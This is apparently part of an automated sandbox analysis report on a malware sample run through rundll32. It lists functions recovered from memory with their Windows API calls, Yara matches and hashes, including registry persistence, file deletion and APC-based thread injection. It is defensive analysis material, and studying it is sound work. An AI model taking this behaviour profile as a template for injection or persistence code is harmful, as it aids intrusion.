                                • lstrlen.KERNEL32(00000000), ref: 034363A7
                                • lstrlenW.KERNEL32(80000002), ref: 034363AE
                                • wsprintfW.USER32 ref: 034363F4
                                • lstrlen.KERNEL32(?,00000004), ref: 03436417
                                • lstrlen.KERNEL32(?), ref: 03436420
                                • lstrlen.KERNEL32(?), ref: 03436427
                                • lstrlenW.KERNEL32(?), ref: 0343642E
                                • wsprintfW.USER32 ref: 03436465
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                • String ID:
                                • API String ID: 822878831-0
                                • Opcode ID: a79cb013d3be4c416c0209c798a5019db278f4d5c72ac42142db8d8237c265dc
                                • Instruction ID: ffa937610e5ac52a7762c6deb4d86a7c93c8d55119e04801acdeece331b4b94c
                                • Opcode Fuzzy Hash: a79cb013d3be4c416c0209c798a5019db278f4d5c72ac42142db8d8237c265dc
                                • Instruction Fuzzy Hash: B4515D76D0021ABFCF11EFA5DC84ADE7BB5EF49314F064066E904AF210DB358A11DB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03485353 Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 03485389
                                • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0348539E
                                • RegCreateKeyA.ADVAPI32(80000001,?), ref: 034853C6
                                • HeapFree.KERNEL32(00000000,?), ref: 03485407
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03485417
                                • RtlAllocateHeap.NTDLL(00000000,0347DA9D), ref: 0348542A
                                • RtlAllocateHeap.NTDLL(00000000,0347DA9D), ref: 03485439
                                • HeapFree.KERNEL32(00000000,00000000,?,0347DA9D,00000000,?,?,?), ref: 03485483
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0347DA9D,00000000,?,?,?,?), ref: 034854A7
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0347DA9D,00000000,?,?,?), ref: 034854CC
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0347DA9D,00000000,?,?,?), ref: 034854E1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$Allocate$CloseCreate
                                • String ID:
                                • API String ID: 4126010716-0
                                • Opcode ID: ab20af7607ab834c057165506cd154e670bcaf7dbffbd575dac50b7cdca018c1
                                • Instruction ID: 326524a2bad65e31cb6e0a5cc33e60056e4d61f38914bf23546ccbd7f661619b
                                • Opcode Fuzzy Hash: ab20af7607ab834c057165506cd154e670bcaf7dbffbd575dac50b7cdca018c1
                                • Instruction Fuzzy Hash: 8051D1B5C00209EFDF01EF95D8849EEBBB9FF09351F1444AAE905BA220D3358A94DF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347CEC3 Relevance: 16.6, APIs: 11, Instructions: 121memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • PathFindFileNameW.SHLWAPI(?), ref: 0347CEDD
                                • PathFindFileNameW.SHLWAPI(?), ref: 0347CEF3
                                • lstrlenW.KERNEL32(00000000), ref: 0347CF36
                                • RtlAllocateHeap.NTDLL(00000000,0349350B), ref: 0347CF4C
                                • memcpy.NTDLL(00000000,00000000,03493509), ref: 0347CF5F
                                • _wcsupr.NTDLL ref: 0347CF6B
                                • lstrlenW.KERNEL32(?,03493509), ref: 0347CFA4
                                • RtlAllocateHeap.NTDLL(00000000,?,03493509), ref: 0347CFB9
                                • lstrcpyW.KERNEL32(00000000,?), ref: 0347CFCF
                                • lstrcatW.KERNEL32(00000000,?), ref: 0347CFF5
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347D004
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                • String ID:
                                • API String ID: 3868788785-0
                                • Opcode ID: cd39e5be2cbfd53f8a8011da33f15640f2ff28c1e94d58418cda7936a6cad47f
                                • Instruction ID: d187414d47095eb387f59fb80597c113f8b2e4f23ba94d7dc2484f17b06f10b5
                                • Opcode Fuzzy Hash: cd39e5be2cbfd53f8a8011da33f15640f2ff28c1e94d58418cda7936a6cad47f
                                • Instruction Fuzzy Hash: 20311A32510214AFC721EF74DCC89AFBBE8EF56210B29051BF911EF289DB319C068B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347161A Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0347163E
                                  • Part of subcall function 0348447B: RegCloseKey.ADVAPI32(?,?), ref: 03484502
                                • lstrcmpiW.KERNEL32(?,?,?,?,00000000,?,00000000,?), ref: 0347166D
                                • lstrlenW.KERNEL32(?,?,?,00000000,?,00000000,?), ref: 0347167E
                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 034716B8
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?), ref: 034716DA
                                • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 034716E3
                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 034716F9
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 0347170E
                                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 03471722
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 03471737
                                • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 03471740
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                • String ID:
                                • API String ID: 534682438-0
                                • Opcode ID: 79c694e460f498b8a7b4a37810978899bcc7b0e81d494a6d1afcedd297c620e8
                                • Instruction ID: 3bc1326823718771c6bf3204a7f415a4713fbb4f53fc9aedbb93936f1100909c
                                • Opcode Fuzzy Hash: 79c694e460f498b8a7b4a37810978899bcc7b0e81d494a6d1afcedd297c620e8
                                • Instruction Fuzzy Hash: 90314975500108BFCB12EFA9DC89CEE7BFDFB59340B184156F905EA124E3328A45DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034833CD Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 034833E4
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,03480B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0347C1F8,00000000,00000094), ref: 034833F6
                                • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,03480B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0347C1F8,00000000,00000094), ref: 03483403
                                • wsprintfA.USER32 ref: 0348341E
                                • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,0347C1F8,00000000,00000094,00000000), ref: 03483434
                                • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 0348344D
                                • WriteFile.KERNEL32(00000000,00000000), ref: 03483455
                                • GetLastError.KERNEL32 ref: 03483463
                                • CloseHandle.KERNEL32(00000000), ref: 0348346C
                                • GetLastError.KERNEL32(?,00000000,?,03480B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0347C1F8,00000000,00000094,00000000), ref: 0348347D
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,03480B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,0347C1F8,00000000,00000094), ref: 0348348D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                • String ID:
                                • API String ID: 3873609385-0
                                • Opcode ID: de73218b89ec11f4a764c03420e143d22f53981409e06672baf89c24d9b0a330
                                • Instruction ID: 0e3d2bf192b8aaaf968529573cddafffb040df9b7b0e25a47a16c827a9733910
                                • Opcode Fuzzy Hash: de73218b89ec11f4a764c03420e143d22f53981409e06672baf89c24d9b0a330
                                • Instruction Fuzzy Hash: 581105791012187FE2127F25AC8CE7F3BDCEB17A65B15016BF906EA144DB504C0986B4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03477FFF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • StrChrA.SHLWAPI(00000000,0000002C,765BD3B0,00000000,76C85520,76CDF710), ref: 03478030
                                • StrChrA.SHLWAPI(00000001,0000002C), ref: 03478043
                                • StrTrimA.SHLWAPI(00000000,?), ref: 03478066
                                • StrTrimA.SHLWAPI(00000001,?), ref: 03478075
                                • lstrlen.KERNEL32(00000000), ref: 034780AA
                                • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 034780BD
                                • lstrcpy.KERNEL32(00000004,00000000), ref: 034780DB
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 034780FF
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                • String ID: W
                                • API String ID: 1974185407-655174618
                                • Opcode ID: b99e8f3d21267dcc76c04b77bbc399a3c33a34cb048d144c906429895d3d336f
                                • Instruction ID: 0699bad10b456a329370c06cff4ca964ecf41495857c1389f155f7aaca814ae4
                                • Opcode Fuzzy Hash: b99e8f3d21267dcc76c04b77bbc399a3c33a34cb048d144c906429895d3d336f
                                • Instruction Fuzzy Hash: 33316975900218AFCB11EFA8CC4AE9EBBF8EF19740F15805BF844AF600E77599418BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03483C97 Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(0616CBB8,00000000,00000000,00000000,?), ref: 03483CBA
                                • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 03483CC9
                                • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 03483CD6
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 03483CEE
                                • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 03483CFA
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03483D16
                                • wsprintfA.USER32 ref: 03483DF8
                                • memcpy.NTDLL(00000000,00004000,?), ref: 03483E45
                                • InterlockedExchange.KERNEL32(0349A128,00000000), ref: 03483E63
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03483EA4
                                  • Part of subcall function 0348E3CD: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0348E3F6
                                  • Part of subcall function 0348E3CD: memcpy.NTDLL(00000000,?,?), ref: 0348E409
                                  • Part of subcall function 0348E3CD: RtlEnterCriticalSection.NTDLL(0349A428), ref: 0348E41A
                                  • Part of subcall function 0348E3CD: RtlLeaveCriticalSection.NTDLL(0349A428), ref: 0348E42F
                                  • Part of subcall function 0348E3CD: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0348E467
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                • String ID:
                                • API String ID: 4198405257-0
                                • Opcode ID: 732c263b7253ae748ee5b35dcb3413124a133baa8a72c74bef609c373309a049
                                • Instruction ID: 4f50074a2f17eb5ad1eddebe72be373a9ed2b42447440360bf191ff62b364100
                                • Opcode Fuzzy Hash: 732c263b7253ae748ee5b35dcb3413124a133baa8a72c74bef609c373309a049
                                • Instruction Fuzzy Hash: 88617A79A00209EFCF10EFA5D885EAE7BE9FF08704F08456BE805AF200D7749A55CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03488CF3 Relevance: 15.1, APIs: 10, Instructions: 110librarymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,03479100,?), ref: 03488D13
                                • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D1D
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D46
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D54
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D62
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D70
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D7E
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D8C
                                • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 03488DB6
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,03479100,?), ref: 03488E37
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Load$Library$AllocDll@4FreeHeapImports
                                • String ID:
                                • API String ID: 1792504554-0
                                • Opcode ID: d4d8e244c75424f51bc2cb74801ade71de8900e2f7d51edce9764eb3060cb96d
                                • Instruction ID: 0abbf2d7539b6154bdc11de5d571c4b53839fab820e541deedf03e047112d922
                                • Opcode Fuzzy Hash: d4d8e244c75424f51bc2cb74801ade71de8900e2f7d51edce9764eb3060cb96d
                                • Instruction Fuzzy Hash: 6C417C75D00219EFDB00FFA8E886D9E77FCEF19204B5505ABE508EF204D734A9058B59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348E8BB Relevance: 15.1, APIs: 10, Instructions: 98filememorystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03472F91: memset.NTDLL ref: 03472FB3
                                  • Part of subcall function 03472F91: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0347305D
                                • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0348E903
                                • CloseHandle.KERNEL32(?), ref: 0348E90F
                                • PathFindFileNameW.SHLWAPI(?), ref: 0348E91F
                                • lstrlenW.KERNEL32(00000000), ref: 0348E928
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0348E939
                                • wcstombs.NTDLL ref: 0348E948
                                • lstrlen.KERNEL32(?), ref: 0348E955
                                • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 0348E994
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348E9A7
                                • DeleteFileW.KERNEL32(?), ref: 0348E9B4
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                • String ID:
                                • API String ID: 2256351002-0
                                • Opcode ID: 7af01115f446d14eb5b3bdd2998e39d4bc5dd18f0441411d1d8d61241a4c97e4
                                • Instruction ID: 79f9d7825170125ce232c785b1cc7aab726c8ae9905fa79efe512c9435d1dfe3
                                • Opcode Fuzzy Hash: 7af01115f446d14eb5b3bdd2998e39d4bc5dd18f0441411d1d8d61241a4c97e4
                                • Instruction Fuzzy Hash: CD31AC31500208BFCB22BFA2DD48D9F7FB9EF56300F140066F941BA254DB719955DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348B9E9 Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetTickCount.KERNEL32 ref: 0348B9F9
                                • CreateFileW.KERNEL32(03480971,80000000,00000003,0349A1E8,00000003,00000000,00000000,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA16
                                • GetLastError.KERNEL32(?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BABE
                                  • Part of subcall function 0349087A: lstrlen.KERNEL32(?,00000000,0348BA3E,00000027,0349A1E8,?,00000000,?,?,0348BA3E,?,00000001,?,03480971,00000000,?), ref: 034908B0
                                  • Part of subcall function 0349087A: lstrcpy.KERNEL32(00000000,00000000), ref: 034908D4
                                  • Part of subcall function 0349087A: lstrcat.KERNEL32(00000000,00000000), ref: 034908DC
                                • GetFileSize.KERNEL32(03480971,00000000,?,00000001,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA49
                                • CreateFileMappingA.KERNEL32(03480971,0349A1E8,00000002,00000000,00000000,03480971), ref: 0348BA5D
                                • lstrlen.KERNEL32(03480971,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA79
                                • lstrcpy.KERNEL32(?,03480971), ref: 0348BA89
                                • GetLastError.KERNEL32(?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA91
                                • HeapFree.KERNEL32(00000000,03480971,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BAA4
                                • CloseHandle.KERNEL32(03480971,?,00000001,?,03480971), ref: 0348BAB6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                • String ID:
                                • API String ID: 194907169-0
                                • Opcode ID: 17b4697b2dd2ddcd1906412c44fb20f2d97eade96ae9a5474d5c22ca3396aad8
                                • Instruction ID: a4aec5cd1b60911d59f0010e190ea9d805a42a612fef7ba12423f8e29cc584b0
                                • Opcode Fuzzy Hash: 17b4697b2dd2ddcd1906412c44fb20f2d97eade96ae9a5474d5c22ca3396aad8
                                • Instruction Fuzzy Hash: 95212D75900208FFDB11AFA5D849A9EBFF8FF15350F20846BF515EA254D3308A559B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347EE04 Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0347EE2A
                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0347EE36
                                • GetModuleHandleA.KERNEL32(?,0616978E,00000000,?,00000000), ref: 0347EE56
                                • GetProcAddress.KERNEL32(00000000), ref: 0347EE5D
                                • Thread32First.KERNEL32(?,0000001C), ref: 0347EE6D
                                • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 0347EE88
                                • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 0347EE99
                                • CloseHandle.KERNEL32(00000000), ref: 0347EEA0
                                • Thread32Next.KERNEL32(?,0000001C), ref: 0347EEA9
                                • CloseHandle.KERNEL32(?), ref: 0347EEB5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                • String ID:
                                • API String ID: 2341152533-0
                                • Opcode ID: dd2d9f1642dd0dc2d9bc3a94f1103a8345b3c33ac4dd2f51a23b7959f61bbaee
                                • Instruction ID: c8572f05566817d131946e0ff391e478de7ab67dcd8e410efacb534550e84aa1
                                • Opcode Fuzzy Hash: dd2d9f1642dd0dc2d9bc3a94f1103a8345b3c33ac4dd2f51a23b7959f61bbaee
                                • Instruction Fuzzy Hash: 41215C72900108AFDF01EFA5DC89CEF7BBCEB49244B14466BF601FE154D73099959B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347DC41 Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(00000000,?,0348507B), ref: 0347DC56
                                  • Part of subcall function 03485D52: InterlockedExchange.KERNEL32(?,000000FF), ref: 03485D59
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0348507B), ref: 0347DC76
                                • CloseHandle.KERNEL32(00000000,?,0348507B), ref: 0347DC7F
                                • CloseHandle.KERNEL32(00000000,?,?,0348507B), ref: 0347DC89
                                • RtlEnterCriticalSection.NTDLL(?), ref: 0347DC91
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 0347DCA9
                                • Sleep.KERNEL32(000001F4), ref: 0347DCB8
                                • CloseHandle.KERNEL32(00000000), ref: 0347DCC5
                                • LocalFree.KERNEL32(?), ref: 0347DCD0
                                • RtlDeleteCriticalSection.NTDLL(?), ref: 0347DCDA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                • String ID:
                                • API String ID: 1408595562-0
                                • Opcode ID: 4494b4d35631a67ee626e241f42495d50c7de981471b61a4f92c838380d1d3c7
                                • Instruction ID: fd2a580b86d2cd056f49cdeb3d32c9e90d41162cbb09d94914aaf20c42fc1e59
                                • Opcode Fuzzy Hash: 4494b4d35631a67ee626e241f42495d50c7de981471b61a4f92c838380d1d3c7
                                • Instruction Fuzzy Hash: 1D118C71910755EFCB22BB66DD4899BB7ECBF02700329086AE582AE614DB71E440CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347DD7B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,03473DA2,00000000,00000001,?,?,?), ref: 0347DD92
                                • lstrlen.KERNEL32(?), ref: 0347DDA2
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0347DDD6
                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0347DE01
                                • memcpy.NTDLL(00000000,?,?), ref: 0347DE20
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347DE81
                                • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0347DEA3
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Allocatelstrlenmemcpy$Free
                                • String ID: W
                                • API String ID: 3204852930-655174618
                                • Opcode ID: 39f1b8ae5879faf7a87c7201f091ff4d73e1ed0c9e4f98ded4578ff9f8e6006e
                                • Instruction ID: 30794725d2193b4fc03f51d5e30118cde56104d1f4ada772685bbb5c560d66b0
                                • Opcode Fuzzy Hash: 39f1b8ae5879faf7a87c7201f091ff4d73e1ed0c9e4f98ded4578ff9f8e6006e
                                • Instruction Fuzzy Hash: 01416C71C1060AEFCF12DF55CC80AEFBBB9FF15244F18446AE904AB210E7319A548FA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347A107 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0347D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0348DD0F,00000000,00000000,00000004,00000000,?,0347DBAC,?,?,00000000), ref: 0347D435
                                  • Part of subcall function 0347D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0348DD0F,00000000,00000000,00000004,00000000,?,0347DBAC,?), ref: 0347D493
                                  • Part of subcall function 0347D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0347D4A3
                                • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 0347A153
                                • wsprintfA.USER32 ref: 0347A181
                                • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 0347A1DF
                                • GetLastError.KERNEL32 ref: 0347A1F6
                                • ResetEvent.KERNEL32(?), ref: 0347A20A
                                • ResetEvent.KERNEL32(?), ref: 0347A20F
                                • GetLastError.KERNEL32 ref: 0347A227
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                                • String ID: `
                                • API String ID: 2276693960-1850852036
                                • Opcode ID: a05dc837815ece05165d936c1e309360448fa4a9a3662f16beba26e9b8b6447d
                                • Instruction ID: adcf30cd5a19f8fc911ef4111bdc169a47208b91ab3df352847fd87eb7369786
                                • Opcode Fuzzy Hash: a05dc837815ece05165d936c1e309360448fa4a9a3662f16beba26e9b8b6447d
                                • Instruction Fuzzy Hash: F7416971400209EFDF11EFA5D888BDF7BB8FF15310F14456BE801AA350E7319A248BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03473172 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(034743C6,00000000,?,?,?,?,034743C6,00000035,00000000,?,00000000), ref: 034731A2
                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 034731B8
                                • memcpy.NTDLL(00000010,034743C6,00000000,?,?,034743C6,00000035,00000000), ref: 034731EE
                                • memcpy.NTDLL(00000010,00000000,00000035,?,?,034743C6,00000035), ref: 03473209
                                • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03473227
                                • GetLastError.KERNEL32(?,?,034743C6,00000035), ref: 03473231
                                • HeapFree.KERNEL32(00000000,00000000,?,?,034743C6,00000035), ref: 03473254
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                • String ID: (
                                • API String ID: 2237239663-3887548279
                                • Opcode ID: 8f049671b8585871154ed843a682a3e016361a43de828eac28b0c22479da8d3e
                                • Instruction ID: dba92bb1f1f320aa34de56e5140deb35d9826c38ae5dc01ef3f853c1ee0a5632
                                • Opcode Fuzzy Hash: 8f049671b8585871154ed843a682a3e016361a43de828eac28b0c22479da8d3e
                                • Instruction Fuzzy Hash: 4931A039900209AFDB21DF95D845ADBBBB8EF45750F14442AFD45AA200D3309A55EBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

